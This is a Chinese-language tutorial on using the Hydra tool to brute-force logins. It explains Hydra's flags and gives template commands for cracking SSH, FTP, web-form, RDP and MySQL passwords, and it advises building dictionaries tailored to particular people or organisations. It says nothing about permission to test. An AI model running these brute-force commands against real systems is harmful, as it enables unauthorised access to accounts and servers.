利用hydra高效破解服務與協議埠

hydra在希臘神話中是九頭蛇海德拉，不過你把它認為是中國山海經或者西遊記中的九頭蛇，也沒有問題。

hydra工具如此命名，源於可爆破眾多服務或協議埠，這款利器由黑客組織THC開發並開源。

我使用的電腦操作系統是kali linux

hydra是系統自帶的一個工具，所以跳過安裝環節（沒有的話，就從github上克隆一個下來），直接進入主題。打開終端，輸入hydra,第一段話是這樣的。

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

想要真正熟悉一個工具，一定要熟悉它的幫助文件，從下面的截圖第一段可以清晰的看出，它可以破解的埠非常豐富，超出想像。

進一步查看幫助文件，涉及更多指令細節

-l 指定用戶名

-L 指定用戶名字典

-p 指定密碼

-P 指定密碼字典

-C 取代-L/-P，例如admin.txt:password.txt

-q 連接錯誤的不顯示，因為有些ip不一定連接成功

-o 輸出結果文檔

-t 運行線程，默認值為16

-T 平行運行任務，默認值為64，前提是使用-m，因為任務太大

-v 詳細模式

-V 每次破解都顯示嘗試的賬號密碼

-e n 使用空密碼，例如admin對應空密碼

-e s 用戶名密碼相同，例如admin對應admin

-e ns 結合

-m 指定目標文檔,一行限1條，因為這樣才不亂

-f 成功破解一個就停止，前提是使用-m

-R 根據上次進度繼續破解，前提是使用-f，可聯合使用

-s 指定服務埠,因為有些埠不是默認的

-S 使用ssl協議連接，

-w 設置最大超時時間，默認值是30秒，因為有些ip連接等待時間太久

service 指定服務或協議

server 指定ip，可以對應c段

常用的指令基本已經搞清楚了，幫助文檔中也給出了幾個簡單的參考示例。但是，我們要明白，一個工具，懂得如何自定義，才能最大化利用。

1-破解ssh，默認22埠，用戶名一般是root

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip ssh -vV -o jieguo.txt

2-破解ftp，默認21埠，匿名伺服器的默認用戶名為anonymous

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip ftp -vV -o jieguo.txt

3-破解web，顯然這裡的鏈接部分需要不同情況不同構造

get提交：

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns -s 8080 ip http-get/admin/index.php -vV -o jieguo.txt

post提交：

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns -s 8080 iphttp-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"-vV -o jieguo.txt

4-破解rdp，默認3389埠，用戶名一般是administrator或root

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip rdp -vV -o jieguo.txt

5-破解mysql，默認3306埠，用戶名一般是root

hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip mysql -vV -o jieguo.txt

上面5個都是常見的埠爆破，針對其他服務或協議，可以自定義，大同小異，不會就百度。當然，如果字典太大，爆破時間就會很長，單個ip爆破次數，等於用戶名字典乘以密碼字典。

爆破效果的好壞，與字典的大小和質量密切相關，密碼字典可以去github上查找，可以獲取很多，但是涉及到質量，就需要自己去定製。

這裡有兩個途徑，第一，自己從字典中篩選出最常用的那些用戶名密碼，目標小而精，對伺服器進行初步的爆破處理。如果失敗，可以放棄，也可以進入下一步，個性化定製字典（特定個人或組織），可以利用的工具crunch、cupp、cewl等，至於如何使用，後續會提及。只有如此，才能實現相對高效的密碼爆破，節約時間。

當然，hydra被很多人使用，說明它的可用性和易用性很強，是否有同類型的工具呢，當然！medusa和ncrack，針對這兩個工具的利用後續會提及。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！